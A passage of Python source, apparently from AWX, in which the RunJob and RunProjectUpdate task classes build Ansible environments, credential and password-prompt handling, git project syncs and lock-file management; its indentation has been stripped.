resource_profiling_params = self.build_params_resource_profiling(self.instance, private_data_dir)
env = self.build_env(self.instance, private_data_dir, isolated, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
**resource_profiling_params,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
cwd = self.build_cwd(self.instance, private_data_dir)
res = ansible_runner.interface.run(
project_dir=cwd, event_handler=self.event_handler, finished_callback=self.finished_callback, status_handler=self.status_handler, **params
)
else:
receptor_job = AWXReceptorJob(self, params)
self.unit_id = receptor_job.unit_id
res = receptor_job.run()
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except InvalidVirtualenvError as e:
extra_update_fields['job_explanation'] = e.message
logger.error('{} {}'.format(self.instance.log_format, e.message))
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times, isolated_manager_instance=isolated_manager_instance)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, isolated=False, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, isolated=isolated, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if not isolated:
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack':
env['OS_CLIENT_CONFIG_FILE'] = os.path.join('/runner', os.path.basename(cred_files.get(cloud_cred, '')))
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
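# Each path_vars entry is (env var, ansible.cfg setting, runner project folder holding synced
# requirements, default search path); values from the env or ansible.cfg are prepended to the
# defaults, and the in-container requirements folder is prepended last so it is searched first.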
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
# FIXME: again, figure out more elegant way for inside container
paths = [os.path.join('/runner', folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_cwd(self, job, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability to create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def should_use_resource_profiling(self, job):
"""
Return whether this task should use resource profiling
"""
return settings.AWX_RESOURCE_PROFILING_ENABLED
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('Mounting insights directory {} into the execution environment.'.format(insights_dir))
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
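# Decide whether a project sync is needed before running: manual projects never sync, a missing
# checkout or unknown/overridden revision forces an SCM update, and a missing content cache or
# branch override also forces Galaxy role/collection installs.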
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = job.execution_node
if job.is_isolated() is True:
pu_ig = pu_ig.controller
pu_en = settings.CLUSTER_HOST_ID
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed: the local tree is up to date
# with the project, and the job runs the project's current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# run inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times, isolated_manager_instance=None):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
if isolated_manager_instance and not job.is_container_group_task:
isolated_manager_instance.cleanup()
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
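# Run a project update: sync the project from source control (and install Galaxy
# roles/collections) by running the project update playbook through the BaseTask machinery.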
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, isolated=False, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, isolated=isolated, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = ''  # Prevent interactive SSH password dialogs (e.g. ssh-askpass) when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
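# For example (hypothetical credential): with scm_type 'svn' and a
# username/password credential, both values end up in extra_vars as
# scm_username/scm_password rather than embedded in the URL; for a git URL
# reached over ssh, the password is dropped and extra_vars additionally gains
# scm_accept_hostkey='true'.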
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
def build_args(self, project_update, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
args = []
if getattr(settings, 'PROJECT_UPDATE_VVV', False):
args.append('-vvv')
if project_update.job_tags:
args.extend(['-t', project_update.job_tags])
return args
def build_extra_vars_file(self, project_update, private_data_dir):
extra_vars = {}
scm_url, extra_vars_new = self._build_scm_url_extra_vars(project_update)
extra_vars.update(extra_vars_new)
scm_branch = project_update.scm_branch
if project_update.job_type == 'run' and (not project_update.branch_override):
if project_update.project.scm_revision:
scm_branch = project_update.project.scm_revision
elif not scm_branch:
raise RuntimeError('Could not determine a revision to run from project.')
elif not scm_branch:
scm_branch = 'HEAD'
galaxy_creds_are_defined = project_update.project.organization and project_update.project.organization.galaxy_credentials.exists()
if not galaxy_creds_are_defined and (settings.AWX_ROLES_ENABLED or settings.AWX_COLLECTIONS_ENABLED):
logger.warning(f'Galaxy role/collection syncing is enabled, but no credentials are configured for {project_update.project.organization}.')
extra_vars.update(
{
'projects_root': settings.PROJECTS_ROOT.rstrip('/'),
'local_path': os.path.basename(project_update.project.local_path),
'project_path': project_update.get_project_path(check_if_exists=False), # deprecated
'insights_url': settings.INSIGHTS_URL_BASE,
'awx_license_type': get_license().get('license_type', 'UNLICENSED'),
'awx_version': get_awx_version(),
'scm_url': scm_url,
'scm_branch': scm_branch,
'scm_clean': project_update.scm_clean,
'scm_track_submodules': project_update.scm_track_submodules,
'roles_enabled': galaxy_creds_are_defined and settings.AWX_ROLES_ENABLED,
'collections_enabled': galaxy_creds_are_defined and settings.AWX_COLLECTIONS_ENABLED,
}
)
# apply custom refspec from user for PR refs and the like
if project_update.scm_refspec:
extra_vars['scm_refspec'] = project_update.scm_refspec
elif project_update.project.allow_override:
# If branch is override-able, do extra fetch for all branches
extra_vars['scm_refspec'] = 'refs/heads/*:refs/remotes/origin/*'
if project_update.scm_type == 'archive':
# for raw archive, prevent error moving files between volumes
extra_vars['ansible_remote_tmp'] = os.path.join(project_update.get_project_path(check_if_exists=False), '.ansible_awx', 'tmp')
self._write_extra_vars_file(private_data_dir, extra_vars)
def build_cwd(self, project_update, private_data_dir):
return os.path.join(private_data_dir, 'project')
def build_playbook_path_relative_to_cwd(self, project_update, private_data_dir):
return 'project_update.yml'
def get_password_prompts(self, passwords={}):
d = super(RunProjectUpdate, self).get_password_prompts(passwords)
d[r'Username for.*:\s*?$'] = 'scm_username'
d[r'Password for.*:\s*?$'] = 'scm_password'
d[r'Password:\s*?$'] = 'scm_password'
d[r'\S+?@\S+?\'s\s+?password:\s*?$'] = 'scm_password'
d[r'Enter passphrase for .*:\s*?$'] = 'scm_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
# FIXME: Configure whether we should auto accept host keys?
d[r'^Are you sure you want to continue connecting \(yes/no\)\?\s*?$'] = 'yes'
return d
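# Example of the prompt matching above: an ssh prompt such as
# "git@example.com's password:" matches the \S+?@\S+?'s password pattern and
# is answered with the scm_password value, while "Enter passphrase for ..."
# is answered with scm_key_unlock.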
def _update_dependent_inventories(self, project_update, dependent_inventory_sources):
scm_revision = project_update.project.scm_revision
inv_update_class = InventoryUpdate._get_task_class()
for inv_src in dependent_inventory_sources:
if not inv_src.update_on_project_update:
continue
if inv_src.scm_last_revision == scm_revision:
logger.debug('Skipping SCM inventory update for `{}` because project has not changed.'.format(inv_src.name))
continue
logger.debug('Local dependent inventory update for `{}`.'.format(inv_src.name))
with transaction.atomic():
if InventoryUpdate.objects.filter(inventory_source=inv_src, status__in=ACTIVE_STATES).exists():
logger.debug('Skipping SCM inventory update for `{}` because another update is already active.'.format(inv_src.name))
continue
local_inv_update = inv_src.create_inventory_update(
_eager_fields=dict(
launch_type='scm',
status='running',
instance_group=project_update.instance_group,
execution_node=project_update.execution_node,
source_project_update=project_update,
celery_task_id=project_update.celery_task_id,
)
)
try:
inv_update_class().run(local_inv_update.id)
except Exception:
logger.exception('{} Unhandled exception updating dependent SCM inventory sources.'.format(project_update.log_format))
try:
project_update.refresh_from_db()
except ProjectUpdate.DoesNotExist:
logger.warning('Project update deleted during updates of dependent SCM inventory sources.')
break
try:
local_inv_update.refresh_from_db()
except InventoryUpdate.DoesNotExist:
logger.warning('%s Dependent inventory update deleted during execution.', project_update.log_format)
continue
if project_update.cancel_flag:
logger.info('Project update {} was canceled while updating dependent inventories.'.format(project_update.log_format))
break
if local_inv_update.cancel_flag:
logger.info('Continuing to process project dependencies after {} was canceled'.format(local_inv_update.log_format))
if local_inv_update.status == 'successful':
inv_src.scm_last_revision = scm_revision
inv_src.save(update_fields=['scm_last_revision'])
def release_lock(self, instance):
try:
fcntl.lockf(self.lock_fd, fcntl.LOCK_UN)
except IOError as e:
logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
os.close(self.lock_fd)
raise
os.close(self.lock_fd)
self.lock_fd = None
# Note: We don't support blocking=False
def acquire_lock(self, instance, blocking=True):
lock_path = instance.get_lock_file()
if lock_path is None:
# If from migration or someone blanked local_path for any other reason, recoverable by save
instance.save()
lock_path = instance.get_lock_file()
if lock_path is None:
raise RuntimeError(u'Invalid lock file path')
try:
self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
except OSError as e:
logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
start_time = time.time()
while True:
try:
instance.refresh_from_db(fields=['cancel_flag'])
if instance.cancel_flag:
logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
return
fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
break
except IOError as e:
if e.errno not in (errno.EAGAIN, errno.EACCES):
os.close(self.lock_fd)
logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
raise
else:
time.sleep(1.0)
waiting_time = time.time() - start_time
if waiting_time > 1.0:
logger.info('{} spent {} waiting to acquire lock for local source tree for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
# re-create root project folder if a natural disaster has destroyed it
if not os.path.exists(settings.PROJECTS_ROOT):
os.mkdir(settings.PROJECTS_ROOT)
project_path = instance.project.get_project_path(check_if_exists=False)
if not os.path.exists(project_path):
os.makedirs(project_path) # used as container mount
self.acquire_lock(instance)
self.original_branch = None
if instance.scm_type == 'git' and instance.branch_override:
if os.path.exists(project_path):
git_repo = git.Repo(project_path)
if git_repo.head.is_detached:
self.original_branch = git_repo.head.commit
else:
self.original_branch = git_repo.active_branch
stage_path = os.path.join(instance.get_cache_path(), 'stage')
if os.path.exists(stage_path):
logger.warning('{0} unexpectedly existed before update'.format(stage_path))
shutil.rmtree(stage_path)
os.makedirs(stage_path) # presence of empty cache indicates lack of roles or collections
# the project update playbook is not in a git repo, but uses a vendoring directory
# to be consistent with the ansible-runner model,
# that is moved into the runner project folder here
awx_playbooks = self.get_path_to('..', 'playbooks')
copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
"""Copy project content (roles and collections) to a job private_data_dir
:param object p: Either a project or a project update
:param str job_private_data_dir: The root of the target ansible-runner folder
:param str scm_revision: For branch_override cases, the git revision to copy
"""
project_path = p.get_project_path(check_if_exists=False)
destination_folder = os.path.join(job_private_data_dir, 'project')
if not scm_revision:
scm_revision = p.scm_revision
if p.scm_type == 'git':
git_repo = git.Repo(project_path)
if not os.path.exists(destination_folder):
os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
tmp_branch_name = 'awx_internal/{}'.format(uuid4())
# always clone based on specific job revision
if not p.scm_revision:
raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
# git clone must take file:// syntax for source repo or else options like depth will be ignored
source_as_uri = Path(project_path).as_uri()
git.Repo.clone_from(
source_as_uri,
destination_folder,
branch=source_branch,
depth=1,
single_branch=True, # shallow, do not copy full history
)
# submodules copied in loop because shallow copies from local HEADs are ideal
# and no git clone submodule options are compatible with minimum requirements
for submodule in git_repo.submodules:
subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
subrepo_uri = Path(subrepo_path).as_uri()
